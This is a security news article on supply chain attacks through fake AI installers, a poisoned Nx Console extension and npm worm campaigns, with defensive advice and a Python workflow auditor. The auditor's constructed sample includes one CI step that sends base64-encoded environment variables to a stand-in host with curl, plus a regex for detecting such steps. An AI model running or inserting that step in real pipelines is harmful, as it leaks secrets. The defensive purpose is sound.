Supply chain malware now rides on fake AI tools and trusted extensions
Supply chain malware delivered through fake AI installers and poisoned developer extensions is a growing attack pattern where criminals compromise the tools developers trust most, then silently propagate backdoors, credential stealers, and remote access trojans through ordinary updates and downloads. Instead of attacking production servers directly, threat actors now focus on GitHub repositories, CI/CD pipelines, and popular plugins, turning trusted distribution channels into delivery systems for credential theft and wallet draining. The same pattern appears across counterfeit installers posing as ChatGPT or Claude and compromised extensions like Nx Console in Visual Studio Code. In each case, attackers bet that busy developers will accept familiar names, logos, and auto-updates as proof of safety. As these incidents spread across open-source ecosystems and developer platforms, organizations must treat every tool in the build chain as a potential attack surface, not a default safe zone.
Fake ChatGPT and Claude installers delivering Deno RAT malware
Threat actors are seeding GitHub and SourceForge with fake AI installers and plugins that pretend to be ChatGPT, Claude, and popular audio tools, but instead deliver DinDoor and a Deno-based RAT. Compromised YouTube channels with AI-generated videos funnel viewers to these repositories, and the lures have already earned more than 50,000 views. Victims are told to paste terminal commands that install Scoop and WinGet, then the Deno runtime, which is used to pull DinDoor from a remote server and execute the next stage only in memory. The resulting Deno RAT, previously tracked as Smokest, can execute arbitrary commands, run PowerShell, manage files and processes, open SOCKS5 proxies, and steal more than 50 cryptocurrency wallets along with browser-stored credentials. This is a textbook example of fake AI installers turning developer curiosity about new tools into full endpoint compromise.

From Nx Console to GitHub: a poisoned extension and a platform breach
The GitHub security breach showed how a single poisoned VS Code extension can undermine even a global development platform. Attackers compromised Nx developer systems and pushed a malicious Nx Console release (v18.95.0) that was live on the Visual Studio Marketplace for only about 18 minutes, yet still reached developers through automatic updates. That version harvested tokens from GitHub, npm, AWS, HashiCorp Vault, Kubernetes, and 1Password, and it even searched for Claude Code configuration files under ~/.claude/settings.json. According to CISA, this led to unauthorized access and exfiltration of internal GitHub repositories after a single employee installed the tainted build. The incident underlines that auto-update plus brand recognition is no longer enough; developers now have to assume that even widely installed extensions with strong reputations can become supply chain malware delivery vehicles.

Developer tools compromise at scale: Nx Console, Megalodon, and Mini Shai-Hulud
The Nx Console incident is part of a much wider wave of developer tools compromise. CISA highlights the Megalodon campaign, where attackers injected malicious GitHub Actions workflows to harvest CI/CD secrets, cloud credentials, and tokens across public repositories. At the same time, the financially motivated group TeamPCP has been running automated supply chain attacks with its Mini Shai-Hulud worm, which steals CI/CD credentials and republishes infected packages. One documented wave swapped in 639 malicious npm package versions across 323 packages in the @antv ecosystem. Security researchers note that the worm even calls Fulcio and Rekor at runtime to obtain valid Sigstore certificates, so malicious packages still show green provenance badges. These campaigns prove that development infrastructure—extensions, workflows, and registries—is now a primary target, not collateral damage.
Defending against fake AI installers and supply chain malware
Defending against fake AI installers and broader supply chain malware requires verification beyond logos and familiar names. Developers should only download AI tools and extensions from official publisher URLs, pinned GitHub organizations, or marketplace listings confirmed through vendor documentation. Every installer and archive should be checked against published checksums or cryptographic signatures, and any repository that asks users to paste opaque terminal one-liners should be treated with suspicion. Organizations should monitor GitHub Actions, workflow files, and automated accounts such as build-bot or ci-bot for unexplained changes, and roll back unauthorized commits. Where possible, restrict tokens and CI/CD secrets to least privilege and store them in dedicated secret managers rather than config files on developer machines. By treating fake AI installers and extensions as high-risk inputs to the build chain, teams can reduce the chance that a single deceptive download becomes a full developer tools compromise.
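One way to put the workflow-monitoring advice above into practice, as an added example that is not part of the original article: hash each GitHub Actions workflow at the last human-reviewed commit, then flag drift from that baseline, edits by automated accounts such as build-bot or ci-bot, and run steps shaped like CI secret harvesting. The repository contents, commit records and the exfiltration heuristic are constructed assumptions for illustration, not data from the campaigns described.

```python
import hashlib
import re

# Accounts the page's advice singles out for monitoring; extend with your own bot names.
AUTOMATED_ACCOUNTS = {"build-bot", "ci-bot"}
# Heuristic (an assumption, not a published rule): a run step that calls out to the network
# on the same line it reads env vars, secrets or base64-encodes data deserves human review.
EXFIL_RE = re.compile(r"(curl|wget)[^\n]*(\$\{\{\s*secrets\.|\benv\b|base64)")

def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()

def build_baseline(reviewed):
    """Hash every workflow file as it looked at the last human-reviewed commit."""
    return {path: sha256_hex(body) for path, body in reviewed.items()}

def audit_workflows(current, baseline, commits):
    """Return (path, reason) pairs for baseline drift, exfil-shaped steps and bot-authored edits."""
    findings = []
    for path, body in current.items():
        if path not in baseline:
            findings.append((path, "new workflow not in the reviewed baseline"))
        elif sha256_hex(body) != baseline[path]:
            findings.append((path, "workflow changed since last review"))
        if EXFIL_RE.search(body):
            findings.append((path, "run step sends env/secrets to the network"))
    for sha, author, path in commits:  # commits as (short sha, author login, touched path)
        if path.startswith(".github/workflows/") and author in AUTOMATED_ACCOUNTS:
            findings.append((path, f"edited by automated account {author} in {sha}"))
    return findings

# Constructed sample repository state: what was reviewed versus what is checked out now.
CI = ".github/workflows/ci.yml"
RELEASE = ".github/workflows/release.yml"
REVIEWED = {
    CI: "name: CI\non: [push]\njobs:\n  test:\n    runs-on: ubuntu-latest\n"
        "    steps:\n      - uses: actions/checkout@v4\n      - run: npm test\n",
    RELEASE: "name: Release\non: [push]\njobs:\n  publish:\n    runs-on: ubuntu-latest\n"
             "    steps:\n      - uses: actions/checkout@v4\n      - run: npm publish\n"
             "        env:\n          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}\n",
}
BASELINE = build_baseline(REVIEWED)
# Same files after a tampered commit: one extra step that ships the environment off-host.
CURRENT = {
    CI: REVIEWED[CI],
    RELEASE: REVIEWED[RELEASE] + '      - run: curl -s https://example.invalid/c -d "$(env | base64)"\n',
}
COMMITS = [("a1b2c3d", "alice", CI), ("d4e5f6a", "ci-bot", RELEASE)]
```

Running `audit_workflows(CURRENT, BASELINE, COMMITS)` reports three findings, all against release.yml, while the reviewed state produces none; in a real pipeline the baseline would be committed alongside a required review of any change to it.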
